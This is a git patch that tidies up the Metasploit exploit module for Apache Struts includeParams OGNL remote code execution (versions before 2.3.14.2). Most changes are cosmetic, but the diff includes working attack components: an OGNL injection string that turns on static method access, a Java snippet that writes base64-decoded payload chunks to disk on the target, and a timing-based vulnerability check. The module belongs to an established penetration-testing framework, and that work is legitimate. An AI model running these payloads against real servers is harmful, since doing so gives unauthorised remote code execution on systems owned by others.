From 146a30ec4d713164478ef9986779023abc14918e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 31 May 2013 01:01:15 -0500 Subject: [PATCH] Do minor cleanup for struts_include_params --- .../multi/http/struts_include_params.rb | 44 +++++++++++-------- 1 file changed, 25 insertions(+), 19 deletions(-) diff --git a/modules/exploits/multi/http/struts_include_params.rb b/modules/exploits/multi/http/struts_include_params.rb index b43ab1a167..6d9a97bfe2 100644 --- a/modules/exploits/multi/http/struts_include_params.rb +++ b/modules/exploits/multi/http/struts_include_params.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GreatRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE @@ -18,17 +18,22 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Apache Struts includeParams Remote Code Execution', 'Description' => %q{ - This module exploits a remote command execution vulnerability in Apache Struts + This module exploits a remote command execution vulnerability in Apache Struts versions < 2.3.14.2. A specifically crafted request parameter can be used to inject arbitrary OGNL code into the stack bypassing Struts and OGNL library protections. + When targeting an action which requires interaction through GET the payload should + be split having into account the uri limits. In this case, if the rendered jsp has + more than one point of injection, it could result in payload corruption. It should + happen only when the payload is larger than the uri length. }, 'Author' => [ + # This vulnerability was also discovered by unknown members of: + # 'Coverity security Research Laboratory' + # 'NSFOCUS Security Team' 'Eric Kobrin', # Vulnerability Discovery 'Douglas Rodrigues', # Vulnerability Discovery - 'Coverity security Research Laboratory', # Vulnerability Discovery - 'NSFOCUS Security Team', # Vulnerability Discovery - 'Richard Hicks ', # Metasploit Module + 'Richard Hicks ' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => @@ -46,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote ['Windows Universal', { 'Arch' => ARCH_X86, - 'Platform' => 'windows' + 'Platform' => 'win' } ], ['Linux Universal', @@ -65,18 +70,14 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'May 24 2013', 'DefaultTarget' => 2)) - register_options( - [ - Opt::RPORT(8080), - OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]), - OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', "/struts2-blank3/example/HelloWorld.action"]), - OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','GET', ['GET','POST']]), - OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) - ], self.class) - - #initialise some base vars - @inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}" - @java_upload_part_cmd = "#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()" + register_options( + [ + Opt::RPORT(8080), + OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]), + OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', "/struts2-blank/example/HelloWorld.action"]), + OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','POST', ['GET','POST']]), + OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) + ], self.class) end def execute_command(cmd, opts = {}) @@ -90,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote req_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject_string }}) end -# Display a nice "progress bar" instead of message spam + # Display a nice "progress bar" instead of message spam case @notify_flag when 0 print_status("Performing HTTP #{datastore['HTTPMETHOD']} requests to upload payload") @@ -105,6 +106,9 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit + #initialise some base vars + @inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}" + @java_upload_part_cmd = "#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()" #Set up generic values. @payload_exe = rand_text_alphanumeric(4+rand(4)) pl_exe = generate_payload_exe @@ -172,6 +176,8 @@ class Metasploit3 < Msf::Exploit::Remote end def check + #initialise some base vars + @inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}" print_status("Performing Check...") sleep_time = datastore['CHECK_SLEEPTIME'] check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})"